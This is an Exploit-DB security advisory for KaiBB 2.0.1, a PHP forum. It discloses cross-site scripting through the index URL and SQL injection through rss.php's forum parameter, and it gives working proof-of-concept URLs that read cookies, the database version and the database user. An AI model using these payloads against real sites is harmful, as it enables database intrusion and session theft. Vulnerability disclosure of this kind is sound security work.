KaiBB 2.0.1 – SQL Injection

• Exploit Database
• 124 阅读

• 作者： Stefan Schurtz
  日期： 2011-10-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17952/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56

  Advisory: KaiBB 2.0.1 XSS and SQL Injection vulnerabilities Advisory ID: SSCHADV2011-027 Author: Stefan Schurtz Affected Software: Successfully tested on KaiBB 2.0.1 Vendor URL: http://code.google.com/p/kaibb/ Vendor Status: informed CVE-ID: -   ========================== Vulnerability Description: ==========================   KaiBB 2.0.1 is prone to XSS and SQL Injection vulnerabilities   ================== Technical Details: ==================   Cross-site Scripting   http://<target>/kaibb/?&apos;</script><script>alert(document.cookie)</script> http://<target>/kaibb/index.php?&apos;</script><script>alert(document.cookie)</script>   SQL Injection   http://<target>/kaibb/rss.php?forum=&apos; UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL AND &apos;a&apos;=&apos;a http://<target>/kaibb/rss.php?forum=&apos; UNION ALL SELECT NULL, version(), NULL, NULL, NULL, NULL, NULL AND &apos;a&apos;=&apos;a http://<target>/kaibb/rss.php?forum=&apos; UNION ALL SELECT NULL, user(), NULL, NULL, NULL, NULL, NULL AND &apos;a&apos;=&apos;a   ========= Solution: =========   -   ==================== Disclosure Timeline: ====================   08-Oct-2011 - informed developers 08-Oct-2011 - release date of this security advisory   ======== Credits: ========   Vulnerability found and advisory written by Stefan Schurtz.   =========== References: ===========   http://code.google.com/p/kaibb/ http://code.google.com/p/kaibb/issues/detail?id=2 http://www.rul3z.de/advisories/SSCHADV2011-027.txt